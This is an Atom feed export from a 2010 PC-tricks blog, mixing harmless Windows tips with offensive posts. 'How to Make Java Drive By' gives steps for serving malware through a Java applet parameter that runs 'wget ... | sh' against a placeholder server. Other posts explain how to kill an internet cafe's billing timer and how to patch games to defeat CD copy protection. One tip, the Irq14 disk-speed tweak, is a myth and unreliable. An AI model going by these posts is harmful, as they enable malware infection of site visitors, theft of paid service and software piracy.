tray) – In Windows'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_RytRT09XgrE/TKWRrJ5wmOI/AAAAAAAAAC0/d-O3c6Cy4Xw/s72-c/windows-registry.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5464991160150912937</id><published>2010-10-01T00:43:00.002-07:00</published><updated>2010-10-01T00:44:23.117-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dialup'/><title type='text'>Keep Dial Up Connection after Logging off</title><content type='html'>&lt;div class="quote"&gt;You may have noticed that you loose your dial-up connection, after you log off your computer...&lt;br /&gt;&lt;br /&gt;simply  add this string to your registry, and your computer will keep your  connection after you log off, and switch user until you disconnect it&lt;br /&gt;&lt;br /&gt;Standard Warning: You really should back up your system before making any changes to your registry&lt;br /&gt;&lt;br /&gt;1. Open Registry Editor&lt;br /&gt;&lt;br /&gt;2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows&lt;br /&gt;NT\CurrentVersion\Winlogon.&lt;br /&gt;&lt;br /&gt;3. Click Add String Value within the Edit menu.&lt;br /&gt;&lt;br /&gt;4. Type KeepRasConnections in the dialog box, and select REG_SZ as the&lt;br /&gt;Data Type.&lt;br /&gt;&lt;br /&gt;5. Click OK.&lt;br /&gt;&lt;br /&gt;6. In the next dialog box, type 1 and click OK.&lt;br /&gt;&lt;br /&gt;7. Close the Registry Editor.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5464991160150912937?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5464991160150912937/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/keep-dial-up-connection-after-logging.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5464991160150912937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5464991160150912937'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/keep-dial-up-connection-after-logging.html' title='Keep Dial Up Connection after Logging off'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6821481519781479951</id><published>2010-10-01T00:43:00.001-07:00</published><updated>2010-10-01T00:43:41.380-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WINDOWS 7'/><title type='text'>BOOT WINDOWS 7 AT DOUBLE SPEED</title><content type='html'>ONLY FOR MULTI CORES OR MULTI PROCESSORS LIKE DUAL CORE , CORE 2 DUO ETC...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;GO to:::&lt;br /&gt;&lt;br /&gt;START --&gt; RUN --&gt; BOOT (tab) --&gt; ADVANCED OPTIONS --&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;Check check box "Number of processors"....&lt;br /&gt;.&lt;br /&gt;in the drop down below select maximum number ..&lt;br /&gt;.&lt;br /&gt;OK--&gt;APPLY--&gt;RESTART&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6821481519781479951?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6821481519781479951/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/boot-windows-7-at-double-speed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6821481519781479951'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6821481519781479951'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/boot-windows-7-at-double-speed.html' title='BOOT WINDOWS 7 AT DOUBLE SPEED'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-7962578196050500974</id><published>2010-10-01T00:41:00.001-07:00</published><updated>2010-10-01T00:41:38.921-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='run'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><title type='text'>some run commands funny</title><content type='html'>just try these once, very useful shortcuts&lt;br /&gt;&lt;br /&gt;Type 3 Dots ... it opens My Computer&lt;br /&gt;&lt;br /&gt;Type 2 Dots .. it opens c:\Documents and Settings or ur drive name&lt;br /&gt;&lt;br /&gt;type 1 Dot . it opens %userprofile% or c:\Documents and Settings\username&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-7962578196050500974?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/7962578196050500974/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/some-run-commands-funny.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7962578196050500974'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7962578196050500974'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/some-run-commands-funny.html' title='some run commands funny'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4656818012284511210</id><published>2010-10-01T00:39:00.001-07:00</published><updated>2010-10-01T00:39:44.007-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pdf'/><category scheme='http://www.blogger.com/atom/ns#' term='trick'/><title type='text'>PDF Trick!!!</title><content type='html'>Hey peeps now u can listen to wats there in a pdf document instead of reading the whole document....&lt;br /&gt;Try out the following key&lt;br /&gt;combinations for Acrobat 6.0 &amp;amp; 7.0:&lt;br /&gt;- ctrl+ shift + b ---&gt; To hear the whole document&lt;br /&gt;ctrl + shift + v ---&gt; To hear only the page&lt;br /&gt;ctrl + shift + c ---&gt; To resume&lt;br /&gt;ctrl + shift + e ---&gt; To stop&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4656818012284511210?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4656818012284511210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/pdf-trick.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4656818012284511210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4656818012284511210'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/pdf-trick.html' title='PDF Trick!!!'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4741739521396138920</id><published>2010-10-01T00:37:00.000-07:00</published><updated>2010-10-01T00:38:23.098-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='pc'/><title type='text'>view passwords typed in your pc</title><content type='html'>first, u need to have mozilla firefox .&lt;br /&gt;now .. open mozilla firfox.. click on tools.. then select options..&lt;br /&gt;a dialogue box appears..in that click on security..then double click on saved password..now click on show passwords...&lt;br /&gt;thatz all u can see the saved passwords along with the id.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4741739521396138920?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4741739521396138920/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/view-passwords-typed-in-your-pc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4741739521396138920'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4741739521396138920'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/view-passwords-typed-in-your-pc.html' title='view passwords typed in your pc'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2312417612209207862</id><published>2010-10-01T00:36:00.000-07:00</published><updated>2010-10-01T00:37:25.952-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='speed'/><title type='text'>Increase Hard Disk Speed in Windows</title><content type='html'>If you like to increase/optimize your Hard Disk I/O – read/write speed without buying expensive software utilities to do that job, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives; however there are reports that this tweak also does good for SCSI disks.&lt;br /&gt;In any case, it won't harm your system, so try it yourself and let me know what you find!&lt;br /&gt;Steps:&lt;br /&gt;1. Run SYSEDIT.EXE from the start.&lt;br /&gt;2. Expand the system.ini file window.&lt;br /&gt;3.  find a line called [386enh].&lt;br /&gt;4. Press Enter to make one blank line, and in that line type&lt;br /&gt;5. Irq14=4096 (note: This line IS CASE SENSITIVE)&lt;br /&gt;6. Click on the File menu, then choose Save.&lt;br /&gt;7. Close SYSEDIT and reboot your computer.&lt;br /&gt;8. Restart windows!&lt;br /&gt;The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2312417612209207862?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2312417612209207862/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/increase-hard-disk-speed-in-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2312417612209207862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2312417612209207862'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/increase-hard-disk-speed-in-windows.html' title='Increase Hard Disk Speed in Windows'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6961379414580696939</id><published>2010-09-20T19:10:00.001-07:00</published><updated>2010-09-20T19:10:58.999-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VIRUS'/><category scheme='http://www.blogger.com/atom/ns#' term='usb'/><title type='text'>Delete Virus From USB</title><content type='html'>If you are sure that your computer is not infected and you have a virus in your USB and want to delete it manually&lt;br /&gt;&lt;br /&gt;GOTO Folder options&lt;br /&gt;&lt;br /&gt;in "VIEW" tab goto "hide Protected operating system files"&lt;br /&gt;&lt;br /&gt;By unselecting it and "show all files and folders" You will be able to view system files&lt;br /&gt;just open your USB drive by EXPLORER BUTTON Do not double click it&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You Can clearly see the file with .exe extension&lt;br /&gt;Delete autorun.inf and virusname.exe files and now VIRUS HAS BEEN REMOVED&lt;br /&gt;&lt;br /&gt;before do that,&lt;br /&gt;you must Disabled Autoplay,&lt;br /&gt;Run - Gpedit.msc - Computer Configuration - Adminstrative Template -  System - Double Click Turn off Autoplay - Choose Enabled - Turn off  Autoplay on : All Drives&lt;br /&gt;&lt;br /&gt;if you're not disabled autoplay, you can't delete virus,&lt;br /&gt;and maybe virus disable Folder Options too..&lt;br /&gt;&lt;br /&gt;Enjoy please Do reply&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6961379414580696939?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6961379414580696939/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/09/delete-virus-from-usb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6961379414580696939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6961379414580696939'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/09/delete-virus-from-usb.html' title='Delete Virus From USB'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1013324176328658393</id><published>2010-09-20T19:06:00.000-07:00</published><updated>2010-09-20T19:08:27.279-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='unlimited'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><title type='text'>Get Unlimited time in internet cafe</title><content type='html'>In this tutorial I will show you how to disable the timer on the computers in Internet Cafe.&lt;br /&gt;Now create a new Text Document. Then write "CMD" in it, without the quotes and then save it as "anything.bat". (Make sure you're file is .bat)&lt;br /&gt;&lt;br /&gt;Now go to the location where you saved the batch, and run it. If you've done it correctly, you'll see that CMD (Command Prompt) will open.&lt;br /&gt;&lt;br /&gt;Now, write in the CMD: "cd\windows" without the quotes. (This will change the directory to WINDOWS). Then type "regedit" without the quotes and regedit editor should open.&lt;br /&gt;&lt;br /&gt;Now navigate to:&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;HKEY_CURRENT_USER&gt;Appevents&gt;software&gt;classes&gt;microsoft&gt;windows&gt;current version&gt;internet settings&gt;policies&gt;system&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Then on the right pane where it says "Disable Taskmanager", right click on it and scroll down to modify, then change the value of it to "0". Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe's timer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now open task manager and end process of cafes timer&lt;br /&gt;&lt;br /&gt;Enjoy :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1013324176328658393?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1013324176328658393/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/09/get-unlimited-time-in-internet-cafe.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1013324176328658393'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1013324176328658393'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/09/get-unlimited-time-in-internet-cafe.html' title='Get Unlimited time in internet cafe'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1565013553363022546</id><published>2010-09-20T18:55:00.000-07:00</published><updated>2010-09-20T18:57:59.741-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='java'/><category scheme='http://www.blogger.com/atom/ns#' term='fud'/><title type='text'>How to Make Java Drive By</title><content type='html'>First you need a few things:&lt;br /&gt;- A website (You need to know how to upload files)&lt;br /&gt;- Download this this&lt;br /&gt;decrypt the MP5 Hash for the files: 684e4891c194ce891eee4ca6a8980541&lt;br /&gt;- Five minutes&lt;br /&gt;- A server link&lt;br /&gt;- A virtual computer&lt;br /&gt;1 edit Index2: Find the string&lt;br /&gt;&lt;br /&gt;    Quote: &lt;param name='linux1' value="wget YOUR SERVER NAME HERE. etc: http://www.h/Server.exe -O- | sh"&gt; &lt;br /&gt;&lt;br /&gt;Put your server link where it says YOUR SERVER NAME HERE&lt;br /&gt;2 Delete etc: http://www.h/Server.exe&lt;br /&gt;3 Upload ALL of the java files to your website&lt;br /&gt;&lt;br /&gt;Test&lt;br /&gt;1 - Boot your virtual computer&lt;br /&gt;2 - Go your Java drive by&lt;br /&gt;3 - Check your client&lt;br /&gt;4 - If you did this right, you will see your virtual computer&lt;br /&gt;I will help you if you need it, thanks for reading&lt;br /&gt;Thanks For Reading&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1565013553363022546?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1565013553363022546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/09/how-to-make-java-drive-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1565013553363022546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1565013553363022546'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/09/how-to-make-java-drive-by.html' title='How to Make Java Drive By'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6242420649590579763</id><published>2010-09-11T01:20:00.001-07:00</published><updated>2010-09-11T01:22:01.187-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='trick'/><title type='text'>FaceBook Password Trick</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_RytRT09XgrE/TIs79vhhwSI/AAAAAAAAACk/jFVNybP3oFI/s1600/facebookpasswordtrick.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 182px;" src="http://1.bp.blogspot.com/_RytRT09XgrE/TIs79vhhwSI/AAAAAAAAACk/jFVNybP3oFI/s320/facebookpasswordtrick.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5515568100560453922" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Try it WORKs :P&lt;br /&gt;ENjoy&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6242420649590579763?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6242420649590579763/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/09/facebook-password-trick.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6242420649590579763'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6242420649590579763'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/09/facebook-password-trick.html' title='FaceBook Password Trick'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_RytRT09XgrE/TIs79vhhwSI/AAAAAAAAACk/jFVNybP3oFI/s72-c/facebookpasswordtrick.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-7670710152135826668</id><published>2010-08-28T02:28:00.000-07:00</published><updated>2010-08-28T02:30:28.820-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='crack'/><category scheme='http://www.blogger.com/atom/ns#' term='protection'/><category scheme='http://www.blogger.com/atom/ns#' term='cd'/><title type='text'>HOW TO CRACK CD PROTECTIONS</title><content type='html'>&lt;span style="font-weight:bold;"&gt;Chapter I&lt;/span&gt;: About, Programs needed … etc.&lt;br /&gt;Hrp! This tutorial is written by FANATIK, member of the #WAREZFRANCE CREW. It is the&lt;br /&gt;second part of my first tutorial: RiPPing&lt;br /&gt;Tutorial, that explains all about RiPPing except how to crack the CD&lt;br /&gt;protections… so here is the other part – how to finish the RiPPing by cracking&lt;br /&gt;the protection. This will help you w/ the most basic system of protection,&lt;br /&gt;called C- dilla, that is the most usual one…&lt;br /&gt;The programs we will use are 2: first, and decompiler – the files we will&lt;br /&gt;work with are in ExE format, and we need a program that will HeX them (transfer&lt;br /&gt;to 16 base, hexa, form) and locate the orders given in the code, then we will&lt;br /&gt;find the line we need and change it to remove the protection with... – the&lt;br /&gt;second program: we need a program that will *edit* the files, and fetch the&lt;br /&gt;right line number we got using the first program… all those action are easly&lt;br /&gt;done w/ the programs: Win32Dasm (the disassembler - decompiler program, added in&lt;br /&gt;the dir [root/Win32Dasm]), and Hiew (the editing program added in the dir&lt;br /&gt;[root/Hiew]). The programs are added to the tutorial, because I’m not so sure&lt;br /&gt;you can find then on a stable location on the net, in the dir [root/programs].&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter II&lt;/span&gt;: The easy protection.&lt;br /&gt;Okay! To save you from reading this entire tutorial for nothing you’re not going&lt;br /&gt;to use I made this chapter, because there is a good chance you won’t be needing&lt;br /&gt;it! Some games comes w/ protection as a files in the [/Setup] dir (or root&lt;br /&gt;dir) called: [00000001.TMP], [CLCD16.DLL], [CLCD32.DLL] and most important&lt;br /&gt;[CLOKSPL.EXE]... if you see any of them delete it and the protection should&lt;br /&gt;disappear (Important! delete them after making a mirror of the game on your HD,&lt;br /&gt;using the info in the next chapter) … if you are still getting an error message&lt;br /&gt;just keep on reading.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter III&lt;/span&gt;: Finding the right file – and the right error.&lt;br /&gt;The files we are going to work w/ will be the main ExE of the game: you will&lt;br /&gt;find it on the CD, in a dir called [/Setup] or [/data], but the easy way to find&lt;br /&gt;it is just installing the game, and the ExE that starts the game – will be the&lt;br /&gt;ExE we need! ... once you’ve got it make some room on your HD, because we are&lt;br /&gt;going to copy the hole CD to it… before you do that: some games have am option,&lt;br /&gt;when Installing, to Install the full game to the CD (but still needing it to&lt;br /&gt;play), use it if possible, The files you need to copy are all the game files,&lt;br /&gt;in some games it is the root dir of the CD, in others it is the [root/data] dir…&lt;br /&gt;the worst case is when the game is inside a CAB file, then you have to use a CAB&lt;br /&gt;extractor (WinZip 8 should do the job), and if it is protected a different&lt;br /&gt;program that can compile CAB format (I’ll try to put it on the tutorial as&lt;br /&gt;well). Once you’ve done all that – press the ExE, and if the game opens close it&lt;br /&gt;and exit the CD, then press again- you will get an error window! … usually the&lt;br /&gt;line goes like: “Error, please enter CD to run game” or “CD error” or “Error&lt;br /&gt;reading CD-ROM” .. what ever error you get – write it down and remember it, we&lt;br /&gt;are about to look for it in the ExE code, and change it!&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter IV&lt;/span&gt;: Finding the right line number.&lt;br /&gt;Open the first program - Win32Dasm, by unzipping it and clicking on&lt;br /&gt;[/w32dsm89.exe], now we have to load the file we know is the main ExE of the&lt;br /&gt;game, so click on “Disassembler“ in the main menu, then “Open File to&lt;br /&gt;Disassemble...” (Important! Make sure you got 50-100MB free on your HD) before&lt;br /&gt;then pick the file from the clone game dir you made in your HD (Important! make&lt;br /&gt;a backup of the ExE) … after you’ve success fully w8ed while the program&lt;br /&gt;disassembled the file, you will see *a lot * of gibberish… don’t worry! You&lt;br /&gt;don’t have to understand what is says (I don’t, and I’m not so sure ne1 does…&lt;br /&gt;except the programs of course) … (Important! If you can’t read and the font&lt;br /&gt;shows only numbers and bizarre letters, click on “Disassembler” in main menu,&lt;br /&gt;then “Font…” then “select Font” then pick Arial or something in English) … now&lt;br /&gt;you have to find the exact line number out of the 2 million in the file that has&lt;br /&gt;the error message in it, do that by clicking the “String Data references”&lt;br /&gt;button, from the buttons menu (under the main menu) – the second one from the&lt;br /&gt;right (-your right)… now you get a list of all the lines in the ExE that refers&lt;br /&gt;to actions, and you have narrowed the lines from 2 million – to 2 thousand… to&lt;br /&gt;find the error message click the first letter it started w/ (for example, if the&lt;br /&gt;message was “Error reading CD-ROM” click E) then search ‘till you find the&lt;br /&gt;error line you are looking for! … once you’ve found it… it will mark the title,&lt;br /&gt;pick the first line, and it should change color to green (that means the line&lt;br /&gt;can be edited and is important)… to be sure you have taken the right line: if&lt;br /&gt;there is a line like:&lt;br /&gt;“:0044XBCK EB08 ….. (lots of spaces) …. Jmp 0044EBD8” or:&lt;br /&gt;“:0044XBCK EB08 ….. (lots of spaces) …. Call 0044EBD8” or:&lt;br /&gt;“:0044XBCK EB08 ….. (lots of spaces) …. Push 0044EBD8”&lt;br /&gt;you at the right line, it says the command is a function, effected by the user,&lt;br /&gt;and probably the protection we are looking for (notice the words: Jmp = Jamp,&lt;br /&gt;Call = Call, Push = Push)… now that we got the right line we have to find her&lt;br /&gt;number! That is done by looking at the bottom of the program window and in the&lt;br /&gt;line, that should look similar to this one:&lt;br /&gt;“Line:*** Pg *** of *** Code Data @:0045821 @Offset 00045821h in file:***.exe“&lt;br /&gt;notic the number that comes after the word „Offet“ in this line: 00045821h that&lt;br /&gt;is the line number! But notice the letter „h“ at the end of it – you don’t need&lt;br /&gt;it, and don’t forget to remove it from the number, now – the only thing left to&lt;br /&gt;do is changing the line and removing the protection!&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter V&lt;/span&gt;: Editing the line.&lt;br /&gt;After writing down the line number you can minimize Win32Dasm, because for now&lt;br /&gt;we have finished using it. Open the second program: Hiew (added in the&lt;br /&gt;tutorial), this is an editor that will work bad for searching the right line,&lt;br /&gt;but will do if you know the line number and just wanna change it…&lt;br /&gt;Open again the same game ExE you have processed in Win32Dasm. When you enter you&lt;br /&gt;see a lot of gibberish, that’s the code, and you need to change it to the&lt;br /&gt;decoded language… do that by pressing the F4 key and then pick the option&lt;br /&gt;“Decode“ .. heh! Alot better now... now click F5 key, to search the right line,&lt;br /&gt;you will see the line numbers at the left end of the screen is gray, enter the&lt;br /&gt;line number you got from Win32Dasm and it will jump you to the right loction in&lt;br /&gt;the file... now, this is the difficult part, not hard to do – but hard to&lt;br /&gt;explain, near the line number (just at the right) you will see the command in&lt;br /&gt;HeX form, it should be something like BC1BB3D2D1 that is in HeX code (base 16)&lt;br /&gt;which means a number (=byte) is represented by 2 letters/number, so that the&lt;br /&gt;group (BC1BB3D2D1) is made of 5 bytes: BC – 1B – B3 – D2 – D1 ... (10 numbers =&lt;br /&gt;5 bytes, 8 numbers = 4 bytes and so on...), we are about to change evrey byte&lt;br /&gt;from D1 or BC to 90 this is done by pressing the key F3 (activates Editing&lt;br /&gt;option) and pressing, for every byte, the number 90 (90 is the noop number, that&lt;br /&gt;will disable the action)... and in our case, the command will change from&lt;br /&gt;BC1BB3D2D1 to 9090909090 ... once it is done click the key F10 to save the&lt;br /&gt;offset, and exit.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter VI&lt;/span&gt;: Testing.&lt;br /&gt;Now that you have an ExE w/out the error line, activate it from the same clone&lt;br /&gt;dir of the game you made to test it, if its working – congratulation! You have&lt;br /&gt;just cracked a CD protection! … if you are getting another error message redo&lt;br /&gt;the same steps you have do w/ the first error message (in chapters 3-5) to&lt;br /&gt;change it as well (Important! Do it on the same ExE you have edited, and backup&lt;br /&gt;this one as well) 